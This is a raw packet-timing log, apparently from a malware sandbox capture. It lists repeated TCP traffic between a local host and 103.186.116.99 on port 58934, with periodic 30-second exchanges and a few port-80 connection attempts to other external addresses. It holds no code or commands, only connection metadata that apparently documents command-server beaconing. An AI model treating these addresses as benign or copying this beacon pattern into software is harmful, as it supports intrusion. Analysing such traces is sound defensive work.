                                                                                                                                Oct 1, 2024 09:25:36.874524117 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874552965 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874628067 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874643087 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874655962 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874670982 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874682903 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874685049 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874701023 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874715090 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874716043 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874731064 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874744892 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874752045 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874761105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874775887 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874777079 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874792099 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874804020 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874806881 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874821901 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.874846935 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.874876022 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875484943 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875499964 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875518084 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875533104 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875545979 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875546932 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875561953 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875576019 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875581026 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875591040 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875607967 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875611067 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875626087 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875641108 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875643015 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875655890 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875665903 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875673056 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875688076 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875701904 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875701904 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875715971 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875730991 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875731945 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875747919 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875762939 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875763893 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875780106 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.875792027 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.875830889 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.876214981 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876230955 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876275063 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.876358032 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876373053 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876394033 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876409054 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876415014 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.876431942 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876447916 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876451969 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.876462936 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876478910 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876490116 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.876494884 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876509905 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876523018 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.876524925 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876543045 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.876550913 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.876586914 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.881072998 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.958713055 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.958772898 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.958787918 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.958870888 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.958885908 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.958900928 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.958916903 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.958976984 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.958976984 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959021091 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959037066 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959059000 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959085941 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959140062 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959208012 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959223986 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959244013 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959254980 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959281921 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959352016 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959367037 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959379911 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959413052 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959429026 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959435940 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959443092 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959459066 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959474087 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959487915 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959490061 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959532022 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959842920 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959856987 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959871054 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959886074 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959902048 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959902048 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959916115 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.959944963 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.959990025 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960010052 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960035086 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.960057020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960072041 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960087061 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960103035 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960118055 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960119963 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.960160971 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.960349083 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960367918 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960382938 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960396051 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960408926 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.960411072 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960426092 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960443020 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960455894 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.960457087 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960474014 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960489035 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960501909 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.960683107 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960705042 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960720062 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960722923 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.960736036 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960752010 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:36.960779905 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:36.961582899 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.289664984 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.289685011 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.289716959 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.289731026 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.289732933 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.289746046 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.289760113 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.289774895 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.289777040 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.289809942 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.289993048 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290009022 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290031910 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290046930 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290060997 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290075064 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290075064 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290075064 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290090084 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290105104 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290124893 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290136099 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290142059 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290182114 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290438890 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290453911 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290467978 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290482044 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290499926 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290529013 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290604115 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290617943 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290632963 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290647030 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290662050 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290667057 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290676117 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290690899 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290705919 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290708065 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290719032 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290730000 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290735006 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290750027 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290762901 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290764093 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290779114 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290793896 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290808916 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290810108 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.290826082 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.290848017 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.291270018 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291285038 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291299105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291320086 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291328907 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.291335106 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:37.291364908 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.291431904 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:37.292576075 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.612956047 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.617810965 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.617913008 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.617985964 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.618060112 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.622723103 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.622733116 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.622819901 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.622917891 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.622984886 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.623002052 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.623053074 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.627681971 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627700090 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627746105 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627754927 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.627790928 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627799988 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627827883 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627876997 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.627885103 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.628881931 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:42.632591963 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.632667065 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.641346931 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.643795967 CEST5893449173103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:42.643888950 CEST4917358934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:51.773540020 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:51.775284052 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:25:51.780085087 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:21.815222979 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:21.817013025 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:26:21.821959972 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:37.531275988 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:37.857711077 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:38.559745073 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:39.854585886 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:42.257010937 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:47.078071117 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:26:51.900825977 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:51.901937962 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:26:51.906709909 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:26:56.731817007 CEST4917480192.168.2.22178.237.33.50
                                                                                                                                Oct 1, 2024 09:27:05.140791893 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:27:21.928277016 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:27:22.162478924 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:27:22.278465986 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:27:22.283329964 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:27:51.927855968 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:27:51.933218002 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:27:51.938134909 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:21.947355986 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:21.973133087 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:28:21.978177071 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:51.946414948 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:28:51.968250990 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:28:51.973165035 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.655421972 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.660398960 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.665508032 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.671997070 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.671997070 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.676841974 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.888407946 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.936168909 CEST5893449172103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.944411993 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.950104952 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:06.955338001 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.955338001 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:06.960997105 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.183356047 CEST4917258934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.609313965 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.807332993 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.874492884 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.890563011 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.894021034 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.898971081 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:07.899017096 CEST4917558934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:07.907790899 CEST5893449175103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.088140965 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.090117931 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.090167999 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.168730021 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.172852039 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.177647114 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.177690029 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.182527065 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.205689907 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.210586071 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.210633993 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.210669041 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.210732937 CEST4917658934192.168.2.22103.186.116.99
                                                                                                                                Oct 1, 2024 09:29:08.215428114 CEST5893449176103.186.116.99192.168.2.22
                                                                                                                                Oct 1, 2024 09:29:08.215476990 CEST4917658934192.168.2.22103.186.116.99
